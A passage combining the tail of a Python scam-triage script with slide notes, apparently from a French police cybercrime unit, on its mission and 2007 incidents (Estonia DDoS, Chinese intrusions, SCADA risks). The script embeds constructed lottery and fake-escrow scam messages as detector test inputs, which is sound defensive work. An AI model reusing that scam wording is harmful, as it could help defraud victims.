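    Indicator("cash_wire_transfer", r"\b(western union|moneygram)\b", 4),
    Indicator("payment_via_agent", r"\bour agent\b", 2),
    Indicator("identity_document_request", r"(copy|scan\w*).{0,40}\b(identity card|passport)\b", 3),
    Indicator("secrecy_request", r"\bconfidential\b", 2),
    Indicator("do_not_reply", r"\bdo not reply\b", 2),
    Indicator("short_deadline", r"\bvalid for \d+ days?\b|\bas soon as possible\b", 1),
    Indicator("hardship_story", r"\bfamily problems\b|\bneed money\b", 2),
    Indicator("legitimacy_assurance", r"\b100% legitimate\b|\bwithout risk\b", 2),
    Indicator("hide_brand_on_receipt", r"\bnot allowed to write anything about\b", 4),
    # "1.500.00": thousands separator and decimal point both written as a dot.
    Indicator("malformed_amount", r"\b\d{1,3}(?:\.\d{3})+\.\d{2}\b", 2),
)
IMPERSONATED_BRANDS = r"\bebay\b"  # brand invoked as reassurance in the exhibits
BRAND_PLUS_CASH_WEIGHT = 3


@dataclass
class Assessment:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def level(self) -> str:
        """Coarse triage tier; thresholds are a constructed choice for this example."""
        if self.score >= 8:
            return "high"
        return "medium" if self.score >= 4 else "low"


def normalise(text: str) -> str:
    """Collapse line breaks and repeated spaces so phrases split across lines still match."""
    return " ".join(text.split()).lower()


def assess(text: str) -> Assessment:
    body = normalise(text)
    result = Assessment()
    for ind in INDICATORS:
        if re.search(ind.pattern, body):
            result.hits.append(ind.name)
            result.score += ind.weight
    # A trusted brand named as reassurance while the money goes through a cash wire
    # service is the fake-escrow pattern of the eBay exhibit; count it on top of single hits.
    if "cash_wire_transfer" in result.hits and re.search(IMPERSONATED_BRANDS, body):
        result.hits.append("brand_impersonation_with_cash_wire")
        result.score += BRAND_PLUS_CASH_WEIGHT
    return result


def triage(messages: dict) -> dict:
    """Map each message name to its triage tier."""
    return {name: assess(text).level for name, text in messages.items()}


# Constructed English paraphrases of the exhibits, plus a benign control message.
LOTTERY = """NOTIFICATION: We are pleased to inform you of the draw of the Euro Millions lottery.
Your e-mail address drew the winning numbers and you have won 1.500.00 EUR in cash.
For security reasons keep your winning information confidential until the money is transferred.
Do not reply to our broadcast sponsor. Contact only our agent with a scanned copy of your
identity card or passport. The access code will remain valid for 3 days."""
CAR_OFFER = """I live in Rome, Italy and can deliver the car. The immediate price is 5500 euros,
shipping included. I have some family problems and need money urgently, which is why the price
is so low. I want to assure you that this deal is 100% legitimate. Payment will be made using
eBay security. Send me your full name and shipping address (including your eBay name) as soon
as possible."""
FAKE_ESCROW = """eBay sent this message to a registered eBay member. Your money will be held until
you receive the car. For security reasons you will not pay the seller. Make the payment in cash
(5200 euros) at the nearest Western Union office to our agent, Olivia Tunder, Rome, Italy.
You are not allowed to write anything about eBay on the Western Union receipt.
Do not reply to this e-mail, as your reply will not be received."""
BENIGN = """Thank you for your order #48213. Your parcel was handed to the carrier today and should
arrive within 3 working days. You can track it from your account page. If you have questions,
reply to this e-mail and our support team will help."""

if __name__ == "__main__":
    for name, text in {"lottery": LOTTERY, "car_offer": CAR_OFFER,
                       "fake_escrow": FAKE_ESCROW, "benign": BENIGN}.items():
        a = assess(text)
        print(f"{name:12s} {a.level:6s} score={a.score:2d} hits={a.hits}")
```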

The response from institutions

• National Police Directorate
• National Gendarmerie Directorate (STRJD-NTECH)
• Police Prefecture (BEFTI-BFMP)

The OCLCTIC
Decree No. 2000-405 of May 15, 2000

• Interministerial authority
• National competence
  - Centralization and documentation
  - Operational role
  - Prevention of criminal activity
  - Statistical analysis
• Fight against sensitive activities of international scope

The OCLCTIC

Tasks: On the national level
• Centralization of information and coordination
• Specialized criminal police investigations of a sensitive or confidential nature, of national or international scope.

The OCLCTIC

Tasks: On the national level
• Technical service to central and local services,
  - for statements or searches,
  - during hearings.
• Training of ESCI (specialized IT crime investigators)

The OCLCTIC

• Prevention of criminal activity:
  - Reports of the Observatory for Payment Card Security
  - French Banking Federation, GIE CB (interbank bank card system), Association of French Mobile Operators, etc.
  - Reporting of illegal content on the Internet

The OCLCTIC

Tasks - On the international level:
• National Interpol contact, managing messages from National Central Bureaus,
• G8 contact and participation in the high tech crime working group,
• European Commission - Expert Group,
• Member of the Interpol “High Tech Crime” and Europol Analytical Work Files (AWF) working groups

Challenges

• International cooperation
• Prevention
• Adaptation of national services to face new threats

2007 Overview

Sophistication of attacks

Malicious intent on eBusiness
• Credit card fraud via Internet
• Scams via auction sites

Notable events
• “Cyberwar” in Estonia
• “Chinese” cyberattacks
• Security stakes for SCADA infrastructures

Notable event: “Cyberwar” in Estonia

Internet attacks from late April to mid-May after a monument commemorating Russian soldiers (WWII) was moved.
• Street demonstrations
• Defacement of Web sites, DoS (denial of service) attacks against Estonian government sites and infrastructures
• Government program for the development of new technologies (Estonian Information Society Strategy 2013)
• Profusion of neologisms in the press and in blogs: cyberwar, world war web, etc.
• Russia is accused…

Notable event: “Cyberwar” in Estonia

Mode of operation
• Several waves of varying length and intensity
• An initial “emotional” reaction (April 27-29): “traditional” DoS attacks (flooding)
• More sophisticated use of botnets during the second wave (-> May 18)
• Geographical delocalization (outside Russia)

[Chart: length of the 128 DoS attacks (source: Arbor), bucketed as < 1 min., < 60 min., 1-10 h and as long as 10 hours; the largest bucket accounts for 62% of the attacks]

Notable event: “Cyberwar” in Estonia

Cyber-demonstration (violent), yes; militarized attack (cyberwar)… Nothing established, but it poses a problem for the State in managing the rapid, “spontaneous” emergence of action groups on the Web, sometimes even linked to or synchronized with street demonstrations.

What preparation and reaction by State services? Growing need for transnational collaboration. Some arrests were made…

The stakes remain the sabotage of infrastructures and national and international opinion of the events…

Webography

http://www.statesmanjournal.com/apps/pbcs.dll/article?AID=2008801120306&template=printart
http://www.ecrans.fr/Cyber-offensive-contre-l-Estonie.html
http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date/
http://www.smh.com.au/news/Technology/Estonia-urges-firm-EU-NATO-response-to-new-form-of-warfarecyberattacks/2007/05/16/1178995207414.html
http://www.informationweek.com/story/showArticle.jhtml?articleID=201202784
http://www.theregister.co.uk/2007/05/07/estonian_attacks_suspect/

Notable event: “Chinese” cyberattacks

China has already been the focus of discussions:
• Lead paint used on children’s toys
• Inflammability of textiles
• Food in violation of health regulations
• Etc.

What was the context surrounding this media hype?
• For some, the APEC summit (Asia Pacific Economic Co-operation) of the following week
• For others, the approaching 17th Congress of the Chinese Communist Party the following month (see IOL no. 554)

=> The work of media pressure?

Notable event: “Chinese” cyberattacks
Chinese attack(s)

June, the Pentagon (US Defense Secretary) e-mail service is compromised
“…John Hamre, a Clinton-era deputy defence secretary involved with cyber security, said that while he had no knowledge of the June attack, criminal groups sometimes masked cyber attacks to make it appear they came from government computers in a particular country”
“…National Security Council said the White House … consider whether the administration needed to restrict the use of BlackBerries…”

American code name for these operations: “”

Late August, Trojan Horses and a release from the German BfV
“…The attacks came almost daily - from Lanzhou in north-west China, from Canton or from Peking…” (Spiegel)
…but already a release in February: “Chinese hackers spy on German small and medium-sized businesses” (Spiegel)

Notable event: “Chinese” cyberattacks
Chinese attack(s)

September, warnings from the British government without mention of a particular mode of operation…except in December, Trojan horse: espionage at Rolls-Royce and Shell

September, SGDN (France) rebound attacks “I am not in a position to say if these attacks are the work of the Chinese government…we know that there was a Chinese site in the ‘loop’.”(SGDN in Le Monde)

Australia and New Zealand are also victims of attacks

Various types of attacks… But no comments on the disclosure, dysfunction, blockage or sabotage of an information system

Webography

http://www.ft.com/cms/s/0/9dba9ba2-5a3b-11dc-9bcd-0000779fd2ac.html?nclick_check=1
http://www.ft.com/cms/s/0/9dba9ba2-5a3b-11dc-9bcd-0000779fd2ac.html
http://business.timesonline.co.uk/tol/business/markets/china/article2988228.ece
http://business.timesonline.co.uk/tol/business/industry_sectors/technology/article2980250.ece
http://www.spiegel.de/politik/deutschland/0,1518,502076,00.html
http://www.spiegel.de/netzwelt/tech/0,1518,501954,00.html
http://www.spiegel.de/wirtschaft/0,1518,465041,00.html
http://www.guardian.co.uk/technology/2007/sep/04/news.internet
http://www.lemonde.fr/web/article/0,1-0@2-3224,36-952776@51-952866,0.html

Notable event: Security issues for SCADA infrastructures

SCADA: Supervisory Control And Data Acquisition
Large-scale distributed measurement and control system (Wikipedia)
Transmission and distribution of essential resources and services: water, gas, electricity, chemical products or signalling systems, etc.

Notable event: Security issues for SCADA infrastructures

A harder-to-implement security policy (source: INL Critical Infrastructure Protection Center, 2007)

Notable event: Security issues for SCADA infrastructures

• Revived awareness after the events of 2001
• Traditional malicious acts, but with potentially more serious effects
  - 2003, Slammer worm and nuclear plant (Ohio)
  - 2003, Nachi worm and Diebold ATM network; virus and railroad signalling (Florida)
  - 2007 (and 2000 in Australia), logical sabotage by a network administrator of a water supply system (California)
  - 2007, experimental destruction of an electric generator (Idaho, for CNN)

Notable event: Security issues for SCADA infrastructures

2007, significant volume of White Papers and documentation on SCADA security: Idaho National Laboratory, NIST (SP 800-82), SANS, TSWG…

SCADA (in)Security: HITB SecConf 2007 (Malaysia), 24C3 (CCC, Berlin)

An upcoming Clusif conference ☺

Webography

http://www.theregister.co.uk/2007/05/21/alabama_nuclear_plant_shutdown/
http://www.informationweek.com/story/showArticle.jhtml?articleID=13100807
http://www.theregister.co.uk/2007/11/30/canal_system_hack/
http://www.networkworld.com/news/2007/112907-insider-charged-with-hacking-california.html
http://www.cnn.com/2007/US/09/26/power.at.risk/index.html
http://www.theregister.co.uk/2003/11/25/nachi_worm_infected_diebold_atms/
http://www.securityfocus.com/news/11351
http://www.forbes.com/2007/08/22/scada-hackers-infrastructure-tech-security-cx_ag_0822hack.html

In closing, we would have also liked to discuss…

Use of hackers by the MPAA

SAP hacking

Fake calls to emergency services, “swatting” (American SWAT raids)

Swedish hacker and Tor network monitoring

Webography

http://www.wired.com/politics/onlinerights/news/2007/10/p2p_hacker
http://www.pcinpact.com/actu/news/39602-MPAA-TorrentSpy-pirate-bittorrent.htm
http://www.pcwelt.de/index.cfm?pid=844&pk=95454
http://blog.wired.com/27bstroke6/2007/11/guilty-plea-pho.html
http://blog.wired.com/27bstroke6/2007/12/blind-hacker-sa.html
http://blog.wired.com/27bstroke6/files/rosoff.pdf
http://www.heise-security.co.uk/news/95778
http://www.theage.com.au/news/security/the-hack-of-the-year/2007/11/12/1194766589522.html
